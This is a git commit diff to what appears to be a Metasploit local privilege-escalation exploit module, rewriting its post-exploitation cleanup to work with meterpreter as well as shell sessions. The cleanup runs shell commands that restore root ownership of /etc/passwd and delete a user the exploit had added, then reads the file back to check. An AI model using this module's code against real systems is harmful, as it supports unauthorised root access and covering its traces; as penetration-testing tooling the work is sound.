Support cleanup for meterpreter sessions
Brendan Coles
parent
74ab02f27b
commit
e158ccb20b
|
|
@ -174,16 +174,65 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_new_session(session)
|
def on_new_session(session)
|
||||||
# Reinstate /etc/passwd ownership
|
if session.type.to_s.eql? 'meterpreter'
|
||||||
session.shell_command_token "chown root:root #{@chown_file}"
|
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
|
||||||
|
|
||||||
# Remove new user
|
|
||||||
session.shell_command_token "sed -i 's/^#{@username}.*$//g' #{@chown_file}"
|
|
||||||
passwd = session.shell_command_token "grep #{@username} #{@chown_file}"
|
|
||||||
if passwd.include? @username
|
|
||||||
print_warning "Could not remove user '#{@username}' from #{@chown_file}"
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Reinstate /etc/passwd root ownership and remove new user
|
||||||
|
root_owns_passwd = false
|
||||||
|
new_user_removed = false
|
||||||
|
|
||||||
|
if session.type.to_s.eql? 'meterpreter'
|
||||||
|
# Reinstate /etc/passwd root ownership
|
||||||
|
session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""
|
||||||
|
|
||||||
|
# Remove new user
|
||||||
|
session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""
|
||||||
|
|
||||||
|
# Wait for clean up
|
||||||
|
Rex.sleep 5
|
||||||
|
|
||||||
|
# Check root ownership
|
||||||
|
passwd_stat = session.fs.file.stat(@chown_file).stathash
|
||||||
|
if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
|
||||||
|
root_owns_passwd = true
|
||||||
|
end
|
||||||
|
|
||||||
|
# Check for new user in /etc/passwd
|
||||||
|
passwd_contents = session.fs.file.open(@chown_file).read.to_s
|
||||||
|
unless passwd_contents.include? "#{@username}:"
|
||||||
|
new_user_removed = true
|
||||||
|
end
|
||||||
|
elsif session.type.to_s.eql? 'shell'
|
||||||
|
# Reinstate /etc/passwd root ownership
|
||||||
|
session.shell_command_token "chown root:root #{@chown_file}"
|
||||||
|
|
||||||
|
# Remove new user
|
||||||
|
session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"
|
||||||
|
|
||||||
|
# Check root ownership
|
||||||
|
passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
|
||||||
|
if passwd_owner.to_s.include? 'root'
|
||||||
|
root_owns_passwd = true
|
||||||
|
end
|
||||||
|
|
||||||
|
# Check for new user in /etc/passwd
|
||||||
|
passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
|
||||||
|
unless passwd_user.to_s.include? "#{@username}:"
|
||||||
|
new_user_removed = true
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
unless root_owns_passwd
|
||||||
|
print_warning "Could not reinstate root ownership of #{@chown_file}"
|
||||||
|
end
|
||||||
|
|
||||||
|
unless new_user_removed
|
||||||
|
print_warning "Could not remove user '#{@username}' from #{@chown_file}"
|
||||||
|
end
|
||||||
|
rescue => e
|
||||||
|
print_error "Error during cleanup: #{e.message}"
|
||||||
|
ensure
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue